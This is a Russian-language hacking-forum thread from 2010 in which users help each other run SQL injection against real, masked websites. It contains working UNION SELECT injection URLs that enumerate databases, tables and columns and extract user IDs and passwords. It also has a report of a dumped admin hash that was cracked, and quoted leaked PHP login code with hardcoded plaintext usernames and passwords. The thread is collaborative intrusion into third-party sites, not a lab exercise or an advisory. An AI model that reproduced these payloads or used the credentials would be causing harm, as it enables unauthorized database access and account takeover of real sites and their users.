Старый 08.07.2010, 22:59   #21
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

не могу таблицы вывести, точнее запрос правильно построить

http://www.***.com/travel/news.php?id=-91455+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES%20 LIMIT%200,2

тут херь какая то

Последний раз редактировалось Twost; 14.05.2013 в 11:31..
shuba вне форума   Ответить с цитированием
Старый 08.07.2010, 23:06   #22
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от shuba Посмотреть сообщение
не могу таблицы вывести, точнее запрос правильно построить

http://www.***.com/travel/news.php?id=-91455+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES%20 LIMIT%200,2

тут херь какая то
в данном случае можно не использовать limit, все таблицы выводятся списком за один запрос

Код:
http://www.***.com/travel/news.php?id=-91455+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES

Последний раз редактировалось Twost; 14.05.2013 в 11:31..
Ded MustD!e вне форума   Ответить с цитированием
Старый 08.07.2010, 23:12   #23
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

а еще вот тут подскажите, как таблицы вывести.

http://***.ru/article.php?id=-6557+union+select+1,GROUP_CONCAT%28concat_ws%280x3 a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E% 29,3,4,5,6,7+from+information_schema.columns+where +column_name+like+0x257061737325+or+column_name+li ke+0x25702577256425--+

Последний раз редактировалось Twost; 14.05.2013 в 11:32..
shuba вне форума   Ответить с цитированием
Старый 08.07.2010, 23:16   #24
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от shuba Посмотреть сообщение
а еще вот тут подскажите, как таблицы вывести.

http://***.ru/article.php?id=-6557+union+select+1,GROUP_CONCAT%28concat_ws%280x3 a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E% 29,3,4,5,6,7+from+information_schema.columns+where +column_name+like+0x257061737325+or+column_name+li ke+0x25702577256425--+
опять же, не надо мудрить с запросами, все таблицы выводятся списком за 1 запрос, крутим вниз страницы:

Код:
http://***.ru/article.php?id=-6557+union+select+1,2,3,unhex%28hex%28concat_ws%280x3a,table_schema,TABLE_NAME%29%29%29,5,6,7+from+information_schema.columns--+1

Последний раз редактировалось Twost; 14.05.2013 в 11:33..
Ded MustD!e вне форума   Ответить с цитированием
Старый 09.07.2010, 17:30   #25
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

вот колонки есть...а когда пытаюсь вытащить из них что нить, появляется ошибка.

Код:
http://www.***.com/finalrevdisplay.php?id=-143%27+union+select+1,GROUP_CONCAT%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x666f72756d--+


Код:
http://www.***.com/finalrevdisplay.php?id=-143%27+union+select+1,concat_ws%280x3a,forumid,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+forum--+
это ошибка, когда пытаюсь вывести.

Последний раз редактировалось Twost; 14.05.2013 в 11:33..
shuba вне форума   Ответить с цитированием
Старый 09.07.2010, 17:33   #26
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Table 'animeacademy2.forum' doesn't exist
Код:
http://www.***.com/finalrevdisplay.php?id=-143%27+union+select+1,concat_ws%280x3a,forumid,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+animeacademy.forum--+
__________________
Twitter - @Ctacok

Последний раз редактировалось Twost; 14.05.2013 в 11:33..
Ctacok вне форума   Ответить с цитированием
Старый 09.07.2010, 17:41   #27
root_sashok
 
Регистрация: 05.07.2010
Сообщений: 44
Репутация: 5
По умолчанию

Цитата:
Сообщение от shuba Посмотреть сообщение
вот колонки есть...а когда пытаюсь вытащить из них что нить, появляется ошибка.
Это значит, что таблица находится в другой базе. Все базы можно просмотреть запросом:

Код:
http://www.***.com/finalrevdisplay.php?id=-143%27+union+select+1,group_concat%28schema_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.schemata--+
А обращаться к таблицам по запросу база.таблица

Последний раз редактировалось Twost; 14.05.2013 в 11:37..
root_sashok вне форума   Ответить с цитированием
Старый 10.07.2010, 12:21   #28
Dare
 
Аватар для Dare
 
Регистрация: 05.07.2010
Сообщений: 21
Репутация: 2
По умолчанию

Код:
http://www.***.com/buildArticle.php?id=-1028+union+select+1,2,3,4,5,concat_ws%28
0x3a,user_id,user_password%29,7,8+from+user+limit+3,1--+
directq8_doug:phorum2_users
directq8_doug:phorum2_users
directq8_doug:user
directq8_doug:user

directq8_doug:user:user_id,user_name,user_real_nam e,user_password,user_newpassword,user_email,user_o ptions,user
_touched,user_token,user_email_authenticated,user_ email_token,user_email_token_expires,user_
registration,user_newpass_time,user_editcount

http://www.***.com/admin.php

Doug:1:fd83c04a3a625eb3354a824299ec22ea --> 1-bd9c3108692e7a6f0b7e28df7c67c570 :oregon

Ввпервые такое встречаю, мб кто раньше сталкивался? достал из базы, пассы и имена, добрые люди брутнули, но вот незадача админка не дает залогиница без какого либо ответа?
__________________
Продаю воздух

Последний раз редактировалось Twost; 14.05.2013 в 11:38..
Dare вне форума   Ответить с цитированием
Старый 11.07.2010, 10:58   #29
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

А почему не пойти в эту сторону?

http://www.***.com/buildArticle.php?...ere+admin=1--+

Или же можно так ..

http://www.***.com/buildArticle.php?...ere+admin=1--+

PHP код:
<?
global $UserName$LoginUserName$UserPassword$PHP_SELF$REQUEST_URI;
require 
"include.php";
session_register("SessAuthUser","UserName");
if (
$SessAuthUser != TRUE) {
    
//They aren't an auth user
    
if (authenticate()) {
        
//They passed the Authenticate check
        
$SessAuthUser TRUE;
    } else {
        
$SessAuthUser FALSE;
        exit;
    }
}
require 
"connect.php";
require 
"tables.php";
?>
Потом смотрим include.php ...

PHP код:
function authenticate() {
    global 
$UserName$LoginUserName$UserPassword$PHP_SELF$REQUEST_URI;
    
    if ((
$LoginUserName == "rdot") and ($UserPassword == "rdot")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$LoginUserName == "rdot") and ($UserPassword == "rdot")) {
        
$auth TRUE;
        
$UserName $LoginUserName;

...

} elseif ((
$AuthPass == NULL) or (strlen($AuthPass) < 1)) {
        
$auth FALSE;
    } else {
        
$auth FALSE;
        
$mess "Invalid User ID or Password.";
    }
    
    if (
$auth == FALSE) {

... 
Но всё бы было хорошо, если б не ..

Warning: Unknown: Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively in Unknown on line 0

Как я понял, глобальные переменные не работают с сессией.

Последний раз редактировалось Twost; 14.05.2013 в 11:39..
v1d0q вне форума   Ответить с цитированием
Старый 11.07.2010, 11:29   #30
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Dare, функция логина вообще не берет ничего из БД:

PHP код:
function authenticate() {
    global 
$UserName$LoginUserName$UserPassword$PHP_SELF$REQUEST_URI;
    
    if ((
$LoginUserName == "rosenz") and ($UserPassword == "Orion42")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$LoginUserName == "editor") and ($UserPassword == "oregon76")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$LoginUserName == "jobs") and ($UserPassword == "lingo34")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$LoginUserName == "zav") and ($UserPassword == "lingo34")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$LoginUserName == "dean") and ($UserPassword == "trifecta25")) {
        
$auth TRUE;
        
$UserName $LoginUserName;
    } elseif ((
$AuthPass == NULL) or (strlen($AuthPass) < 1)) {
        
$auth FALSE;
    } else {
        
$auth FALSE;
        
$mess "Invalid User ID or Password.";
    }
... 
Только из-за ошибки не получается пройти авторизацию.

Цитата:
Сообщение от v1d0q Посмотреть сообщение
А почему не пойти в эту сторону?

http://www.***.com/buildArticle.php?...ere+admin=1--+
Посмотрел я админку форума, нету ничего интересного там...

Последний раз редактировалось Twost; 14.05.2013 в 11:39..
mailbrush вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot